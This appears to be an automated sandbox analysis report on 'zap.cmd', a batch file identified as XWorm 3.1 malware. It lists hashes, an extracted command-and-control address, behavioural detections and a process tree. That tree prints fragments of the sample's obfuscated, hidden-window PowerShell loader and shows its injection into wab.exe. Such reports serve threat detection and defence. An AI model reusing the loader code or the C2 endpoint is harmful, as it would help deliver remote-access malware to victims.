Analysis

- max time kernel: 146s
- max time network: 145s
- platform: windows7_x64
- resource: win7-20240508-en
- resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
- submitted: 23-05-2024 16:37

- Static task: static1
- Behavioral task: behavioral1
- Sample: zap.cmd
- Resource: win7-20240508-en
General

- Target: zap.cmd
- Size: 6KB
- MD5: 0b65dcbdc755a516181f47d69f5aee10
- SHA1: fc9319ec254c2be1b7ba5174d36d142c1ce20440
- SHA256: 00c866d489bd11732441171441b8db0a135c76bdb7bf5c3adb4da66e97dbed43
- SHA512: e37aba32337a5bf8793721d8d9b9582c906b9820ace2a831d1f6e9548e6631942df0bdf6b56f07c1420fa7ade2d3a1e34bb27cab4ddc7d57a42672919f1ead1c
- SSDEEP: 96:vEWuwXqdcs0faFF/oW8NYEpyGakOwJyZLLi8lTxd7Qhn004g6bnecFhZ3WjS:vurF8NY8yGywAL2Ox5QV004gIFhn
Malware Config

Extracted
- Family: xworm
- Version: 3.1
- C2: xgmn934.duckdns.org:8896
- 2utLZrxcByvppTdF
- install_file: USB.exe
Signatures

Detect Xworm Payload (1 IoC)
  resource: behavioral1/memory/2020-87-0x00000000009E0000-0x00000000009EE000-memory.dmp
  yara_rule: family_xworm

Blocklisted process makes network request (5 IoCs)
  flow  pid   process
  3     2072  powershell.exe
  5     2072  powershell.exe
  7     2072  powershell.exe
  9     2072  powershell.exe
  11    2072  powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run PowerShell and hide display window.

Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  pid   process
  2020  wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid   process
  1884  powershell.exe
  2020  wab.exe

Suspicious use of SetThreadContext (1 IoC)
  description                         pid   process         target process
  PID 1884 set thread context of 2020  1884  powershell.exe  wab.exe

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid   process
  2072  powershell.exe
  1884  powershell.exe
  1884  powershell.exe
  2020  wab.exe

Suspicious behavior: MapViewOfSection (1 IoC)
  pid   process
  1884  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description              pid   process
  Token: SeDebugPrivilege  2072  powershell.exe
  Token: SeDebugPrivilege  1884  powershell.exe
  Token: SeDebugPrivilege  2020  wab.exe

Suspicious use of SetWindowsHookEx (1 IoC)
  pid   process
  2020  wab.exe

Suspicious use of WriteProcessMemory (20 IoCs)
  pid   process         wrote to memory of  target process   count
  1088  cmd.exe         2072                powershell.exe   3
  2072  powershell.exe  2728                cmd.exe          3
  2072  powershell.exe  1884                powershell.exe   4
  1884  powershell.exe  2784                cmd.exe          4
  1884  powershell.exe  2020                wab.exe          6
Processes

[depth 1] C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\zap.cmd"
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);} [remainder of the obfuscated script body omitted]"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"
    [depth 3] C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);} [remainder of the obfuscated script body omitted; identical to the script passed to the parent powershell.exe]"
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      [depth 4] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"
      [depth 4] C:\Program Files (x86)\windows mail\wab.exe
        Command line: "C:\Program Files (x86)\windows mail\wab.exe"
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 344B
  MD5: 7d016db11465393e9c2c18ed06d9c43b
  SHA1: a83beea9c2bec3a13ba38b0bceee169ecb400b6e
  SHA256: b3eb20694b28353926f0b112d1d8133a664d566e4037c6245762efcba8f2fced
  SHA512: 32bb2a60e3680413e86f51a56a8c6055bb6c4ce4c44b7eba27cebcd756c2d95d7aaf4b6812a2fc538e5534be5d931cda3cac683d03cddf1ff7cd4599513a4078

C:\Users\Admin\AppData\Local\Temp\Cab1B40.tmp
  Filesize: 68KB
  MD5: 29f65ba8e88c063813cc50a4ea544e93
  SHA1: 05a7040d5c127e68c25d81cc51271ffb8bef3568
  SHA256: 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
  SHA512: e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar1B53.tmp
  Filesize: 177KB
  MD5: 435a9ac180383f9fa094131b173a2f7b
  SHA1: 76944ea657a9db94f9a4bef38f88c46ed4166983
  SHA256: 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
  SHA512: 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\Roaming\Belejringstilstandenes.Unj
  Filesize: 465KB
  MD5: 61708c02a92801dea7267daf2300d321
  SHA1: 5414b3aed956e83fb5f196f44ce5888dcfd6e4a9
  SHA256: 3b1e99b27d0ac212ee8597aa77c4f3d242a198c06cbf5fc536b0e635a9f203f7
  SHA512: 5787bc03913eac9e7082657d2420e66ed0e7a481e75cccad7f077ee347146ccce06534ed8f7e5105895f9c4e3e011f74fdcd03088eee5736713bc09bb9c3fe85

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9IYO6Z8QHG9DSMKWARW3.temp
  Filesize: 7KB
  MD5: fcf459379405f677338d15dacec2b52d
  SHA1: 2f51bf094efd38f8814d2dc0f90ed662cbfe5402
  SHA256: 754e9c08096f729ff30fb5cdcf0af6a1d9f1e380488bfa033733b977abdf6741
  SHA512: 751a641601ac482e1f4f39594ef604fc59dbfc393773180675b7e344a27e380c325fa632ec58e6a123c30f50cc40b19e66730cab4caf959c1813138b7fd90f0a

Memory dumps
  memory/1884-54-0x0000000006650000-0x000000000C429000-memory.dmp  Filesize: 93.8MB
  memory/2020-87-0x00000000009E0000-0x00000000009EE000-memory.dmp  Filesize: 56KB
  memory/2020-85-0x00000000009E0000-0x0000000001A42000-memory.dmp  Filesize: 16.4MB
  memory/2020-58-0x00000000009E0000-0x0000000001A42000-memory.dmp  Filesize: 16.4MB
  memory/2072-9-0x000007FEF5670000-0x000007FEF600D000-memory.dmp   Filesize: 9.6MB
  memory/2072-10-0x000007FEF5670000-0x000007FEF600D000-memory.dmp  Filesize: 9.6MB
  memory/2072-5-0x000000001B800000-0x000000001BAE2000-memory.dmp   Filesize: 2.9MB
  memory/2072-55-0x000007FEF5670000-0x000007FEF600D000-memory.dmp  Filesize: 9.6MB
  memory/2072-56-0x000007FEF592E000-0x000007FEF592F000-memory.dmp  Filesize: 4KB
  memory/2072-4-0x000007FEF592E000-0x000007FEF592F000-memory.dmp   Filesize: 4KB
  memory/2072-6-0x00000000028F0000-0x00000000028F8000-memory.dmp   Filesize: 32KB
  memory/2072-8-0x000007FEF5670000-0x000007FEF600D000-memory.dmp   Filesize: 9.6MB
  memory/2072-86-0x000007FEF5670000-0x000007FEF600D000-memory.dmp  Filesize: 9.6MB
  memory/2072-7-0x000007FEF5670000-0x000007FEF600D000-memory.dmp   Filesize: 9.6MB